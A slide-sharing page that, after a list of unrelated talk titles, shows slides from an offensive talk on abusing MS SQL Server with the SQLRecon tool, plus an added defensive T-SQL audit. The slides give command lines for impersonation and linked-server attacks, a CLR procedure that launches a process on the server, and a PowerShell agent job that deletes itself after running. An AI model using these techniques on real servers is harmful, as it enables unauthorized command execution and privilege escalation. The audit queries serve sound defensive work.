Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
 
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyArtificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : Uncertainty
 
Top 10 Most Downloaded Games on Play Store in 2024
Top 10 Most Downloaded Games on Play Store in 2024Top 10 Most Downloaded Games on Play Store in 2024
Top 10 Most Downloaded Games on Play Store in 2024
 
GenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdfGenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdf
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century education
 
Manulife - Insurer Innovation Award 2024
Manulife - Insurer Innovation Award 2024Manulife - Insurer Innovation Award 2024
Manulife - Insurer Innovation Award 2024
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)
 
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, AdobeApidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 

Abusing MS SQL Using SQLRecon

  • 12. Basic Modules
    query
    whoami
    databases
    tables
    search
    smb
    Plenty more … (SQLRecon.exe –h)
  • 13. Privilege Check
  • 14. whoami
  • 15. whoami ctd.
  • 16. databases
  • 17. tables
  • 18. search
  • 19. query
  • 20. smb
  • 21. Demo 2: Impersonation Attacks
  • 22. Demo Configuration - Impersonation
    Impersonate is a special permission
    Enables a user or group to:
    - Operate with the permissions of another user;
    - As well as their own permissions.
  • 23. Impersonation
    SQLRecon.exe -a Windows –s SQL02 –d master –m impersonate
    SQLRecon.exe -a Windows –s SQL02 –d master –m iwhoami –i sa
  • 24. impersonate
  • 25. Custom CLR Assemblies
    using System.Data.SqlClient;
    using System.Data.SqlTypes;
    using Microsoft.SqlServer.Server;

    public partial class StoredProcedures
    {
        // Empty CLR stored procedure skeleton; the body is filled in on the next slide.
        [Microsoft.SqlServer.Server.SqlProcedure]
        public static void BaconTime()
        {
        }
    }
    https://gist.github.com/skahwah/c92a8ce41f529f40c14715c91b8f90ce
    https://gist.github.com/skahwah/a585e176e4a5cf319b0c759637f5c410
  • 26. Custom CLR Assemblies
    using System;
    using System.Data;
    using System.Data.SqlClient;
    using System.Data.SqlTypes;
    using Microsoft.SqlServer.Server;
    using System.Diagnostics;

    public partial class StoredProcedures
    {
        [Microsoft.SqlServer.Server.SqlProcedure]
        public static void BaconTime()
        {
            // Demo payload: start notepad.exe on the SQL Server host
            // in the service account's context.
            Process proc = new Process();
            proc.StartInfo.FileName = "C:\\Windows\\System32\\notepad.exe";
            proc.Start();
        }
    }
    https://gist.github.com/skahwah/c92a8ce41f529f40c14715c91b8f90ce
    https://gist.github.com/skahwah/a585e176e4a5cf319b0c759637f5c410
  • 27. ienableclr
  • 28. Upload DLL to disk
  • 29. iclr
  • 30. idisableclr
  • 31. Agent Jobs
    Caveat:
    - SQL Agent must be running
    - Does not work with SQL Server Express edition
    - Works with: Developer, Standard and Enterprise editions
  • 32. iagentstatus
  • 33. Agent Jobs
    -- Runs in the msdb database, where the SQL Agent job procedures live.
    EXEC dbo.sp_add_job @job_name = 'test_ps_job1';
    EXEC sp_add_jobstep @job_name = 'test_ps_job1',
        @step_name = 'test_ps_name1',
        @subsystem = 'PowerShell',
        @command = 'powershell.exe start-process notepad',
        @retry_attempts = 1,
        @retry_interval = 5;
    EXEC dbo.sp_add_jobserver @job_name = 'test_ps_job1';
    EXEC dbo.sp_start_job 'test_ps_job1';
    -- Give the step time to run, then remove the job (and its history).
    WAITFOR DELAY '00:00:05';
    EXEC dbo.sp_delete_job @job_name = 'test_ps_job1';
  • 34. iagentcmd
  • 35. Demo 3: Attacking Linked SQL Servers
  • 36. Demo Configuration - Links
    SQL02 might be segmented from the network you’re on
    A link could exist from SQL01 -> SQL02
    Leverage SQL01 to issue queries on SQL02
  • 37. Linked SQL Servers
    SQLRecon.exe -a Windows –s SQL01 –d master –m links
    SQLRecon.exe -a Windows –s SQL01 –d master –m lwhoami –l SQL02
  • 38. links
    SQLRecon.exe -a Windows –s SQL01 –d master –m links
  • 39. lwhoami
  • 40. ldatabases
  • 41. ltables
  • 42. lenableole
  • 43. lolecmd
  • 44. ldisableole
  • 45. lsmb
  • 46. Development Roadmap
  • 47. To Do’s
    - Expand Command Execution Techniques

    Execution Technique     Standard   Impersonation   Linked
    xp_cmdshell             ✅         ✅              ✅
    OLE Automation          ✅         ✅              ✅
    Custom CLR Assemblies   ✅         ✅              ❌
    Agent Jobs              ✅         ✅              ❌
  • 48. Conclusion
  • 49. Conclusion & Questions
    Address the MS SQL C# post-exploitation tooling gap
    Helps operators using C2 frameworks perform MS SQL attacks
    @sanjivkawa
    github.com/skahwah/SQLRecon
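The three demos above each rest on a server-side condition a defender can inventory: IMPERSONATE grants (slide 22), the xp_cmdshell / OLE Automation / CLR / Agent execution paths (slide 47's table) and linked-server login mappings (slide 36). The T-SQL audit below is an added example written for this page; it is not part of SQLRecon or the talk. It uses only standard SQL Server catalog and DMV views (sys.server_permissions, sys.database_permissions, sys.configurations, sys.dm_server_services, sys.assemblies, msdb.dbo.sysjobs, sys.servers, sys.linked_logins) and is meant to be run by a sysadmin on each instance; the database-scoped sections report only the database it is executed in.

```sql
-- Added defender-side audit for the conditions SQLRecon's modules look for.
-- Not SQLRecon code. Run as sysadmin; change database context to repeat
-- the database-scoped checks (sections 1b and 2c) per database.

-- 1a. Server-level IMPERSONATE grants: which login may act as which login.
--     A grant whose target is a sysadmin member is the case from demo 2
--     (impersonate -> iwhoami -i sa).
SELECT grantee.name                                AS grantee_login,
       target.name                                 AS can_impersonate,
       target.type_desc                            AS target_type,
       IS_SRVROLEMEMBER('sysadmin', target.name)   AS target_is_sysadmin,
       sp.state_desc                               AS grant_state
FROM sys.server_permissions      AS sp
JOIN sys.server_principals       AS grantee ON grantee.principal_id = sp.grantee_principal_id
JOIN sys.server_principals       AS target  ON target.principal_id  = sp.major_id
WHERE sp.permission_name = 'IMPERSONATE'
  AND sp.class_desc = 'SERVER_PRINCIPAL'
ORDER BY target_is_sysadmin DESC, target.name, grantee.name;

-- 1b. Database-level IMPERSONATE grants (users, not logins) in the current DB.
SELECT DB_NAME()        AS database_name,
       grantee.name     AS grantee_user,
       target.name      AS can_impersonate,
       dp.state_desc    AS grant_state
FROM sys.database_permissions    AS dp
JOIN sys.database_principals     AS grantee ON grantee.principal_id = dp.grantee_principal_id
JOIN sys.database_principals     AS target  ON target.principal_id  = dp.major_id
WHERE dp.permission_name = 'IMPERSONATE'
  AND dp.class_desc = 'DATABASE_PRINCIPAL';

-- 2a. Instance options behind the execution techniques on slide 47.
--     value_in_use = 1 means the path is currently enabled; the i*/l* enable
--     modules flip these, and the disable modules flip them back.
SELECT name,
       CAST(value_in_use AS int) AS value_in_use
FROM sys.configurations
WHERE name IN ('xp_cmdshell', 'Ole Automation Procedures',
               'clr enabled', 'clr strict security', 'show advanced options')
ORDER BY name;

-- 2b. SQL Agent service state (the caveat on slide 31: agent jobs need it running).
SELECT servicename, status_desc, startup_type_desc, service_account
FROM sys.dm_server_services
WHERE servicename LIKE 'SQL Server Agent%';

-- 2c. User-defined CLR assemblies in the current DB; anything UNSAFE_ACCESS
--     that the application team cannot account for deserves a look.
SELECT name, permission_set_desc, create_date, modify_date
FROM sys.assemblies
WHERE is_user_defined = 1
ORDER BY create_date DESC;

-- 2d. Agent jobs with shell-capable steps. A job that deletes itself a few
--     seconds after running, as on slide 33, leaves no row here, so this only
--     catches jobs that persist; short-lived ones need auditing of sp_add_job.
SELECT j.name        AS job_name,
       s.step_name,
       s.subsystem,
       s.command,
       j.date_created
FROM msdb.dbo.sysjobs      AS j
JOIN msdb.dbo.sysjobsteps  AS s ON s.job_id = j.job_id
WHERE s.subsystem IN ('PowerShell', 'CmdExec')
ORDER BY j.date_created DESC;

-- 3. Linked servers and login mappings (demo 3). local_principal_id = 0 is the
--    default mapping applied to every local login; a default mapping with a
--    fixed remote_name (e.g. a privileged remote login) lets any local login
--    reach SQL02 with that account. is_rpc_out_enabled = 1 is what allows
--    EXECUTE AT on the link.
SELECT s.name                                   AS linked_server,
       s.data_source,
       s.provider,
       s.is_rpc_out_enabled,
       COALESCE(lp.name, '<all logins>')        AS local_login,
       ll.uses_self_credential,
       ll.remote_name
FROM sys.servers                 AS s
JOIN sys.linked_logins           AS ll ON ll.server_id = s.server_id
LEFT JOIN sys.server_principals  AS lp ON lp.principal_id = ll.local_principal_id
WHERE s.is_linked = 1
ORDER BY s.name, local_login;
```

Rows from sections 1a and 3 are the ones to act on first: removing an IMPERSONATE grant on a sysadmin login, or replacing a default "all logins" mapping with per-login mappings that use the caller's own security context, takes away the privilege SQLRecon's impersonation and linked-server modules piggyback on without touching the application. Section 2a is a snapshot, so pair it with change tracking (SQL Audit or the default trace on sp_configure) to catch an option that is enabled and disabled again within one session.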